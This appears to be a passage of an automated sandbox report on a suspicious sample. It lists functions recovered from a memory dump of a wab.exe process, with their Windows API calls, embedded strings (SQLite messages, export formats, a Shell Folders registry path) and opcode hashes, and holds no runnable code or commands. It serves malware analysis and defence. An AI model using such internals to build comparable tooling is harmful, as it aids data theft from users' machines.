                                                  • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                  • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                  • wcscpy.MSVCRT ref: 0040A0D9
                                                  • wcscat.MSVCRT ref: 0040A0E6
                                                  • wcscat.MSVCRT ref: 0040A0F5
                                                  • wcscpy.MSVCRT ref: 0040A107
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                  • String ID:
                                                  • API String ID: 1331804452-0
                                                  • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                  • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                  • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                  • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                  • String ID: advapi32.dll
                                                  • API String ID: 2012295524-4050573280
                                                  • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                  • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                  • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                  • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • <?xml version="1.0" ?>, xrefs: 0041007C
                                                  • <%s>, xrefs: 004100A6
                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_snwprintf
                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                  • API String ID: 3473751417-2880344631
                                                  • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                  • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscat$_snwprintfmemset
                                                  • String ID: %2.2X
                                                  • API String ID: 2521778956-791839006
                                                  • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                  • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintfwcscpy
                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                  • API String ID: 999028693-502967061
                                                  • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                  • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                  • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                  • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memsetstrlen
                                                  • String ID:
                                                  • API String ID: 2350177629-0
                                                  • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                  • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                  • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                  • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                  • API String ID: 2221118986-1606337402
                                                  • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                  • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                  • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                  • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                  • String ID:
                                                  • API String ID: 265355444-0
                                                  • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                  • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                  • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                  • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                    • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                    • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                  • memset.MSVCRT ref: 0040C439
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                  • _wcsupr.MSVCRT ref: 0040C481
                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                  • memset.MSVCRT ref: 0040C4D0
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                  • String ID:
                                                  • API String ID: 1973883786-0
                                                  • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                  • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                  • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                  • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004116FF
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                    • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                  • API String ID: 2618321458-3614832568
                                                  • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                  • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                  • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                  • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004185FC
                                                  • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@AttributesFilememset
                                                  • String ID:
                                                  • API String ID: 776155459-0
                                                  • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                  • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                  • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                  • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                  • malloc.MSVCRT ref: 00417524
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                  • String ID:
                                                  • API String ID: 2308052813-0
                                                  • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                  • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                  • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                  • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                  • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PathTemp$??3@
                                                  • String ID: %s\etilqs_$etilqs_
                                                  • API String ID: 1589464350-1420421710
                                                  • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                  • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                  • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                  • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040FDD5
                                                    • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                  • _snwprintf.MSVCRT ref: 0040FE1F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                  • API String ID: 1775345501-2769808009
                                                  • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                  • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                  • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                  • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcscpy.MSVCRT ref: 0041477F
                                                  • wcscpy.MSVCRT ref: 0041479A
                                                  • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                  • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscpy$CloseCreateFileHandle
                                                  • String ID: General
                                                  • API String ID: 999786162-26480598
                                                  • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                  • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                  • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                  • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastMessage_snwprintf
                                                  • String ID: Error$Error %d: %s
                                                  • API String ID: 313946961-1552265934
                                                  • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                  • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                  • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                  • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: foreign key constraint failed$new$oid$old
                                                  • API String ID: 0-1953309616
                                                  • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                  • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                  • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                  • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                  • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                  • API String ID: 3510742995-272990098
                                                  • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                  • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                  • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                  • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID: gj
                                                  • API String ID: 1297977491-4203073231
                                                  • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                  • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                  • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                  • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                    • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                  • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                  • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                  • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • AreFileApisANSI.KERNEL32 ref: 00417497
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                  • malloc.MSVCRT ref: 004174BD
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                  • String ID:
                                                  • API String ID: 2903831945-0
                                                  • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                  • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                  • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                  • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetParent.USER32(?), ref: 0040D453
                                                  • GetWindowRect.USER32(?,?), ref: 0040D460
                                                  • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$Rect$ClientParentPoints
                                                  • String ID:
                                                  • API String ID: 4247780290-0
                                                  • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                  • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                  • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                  • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
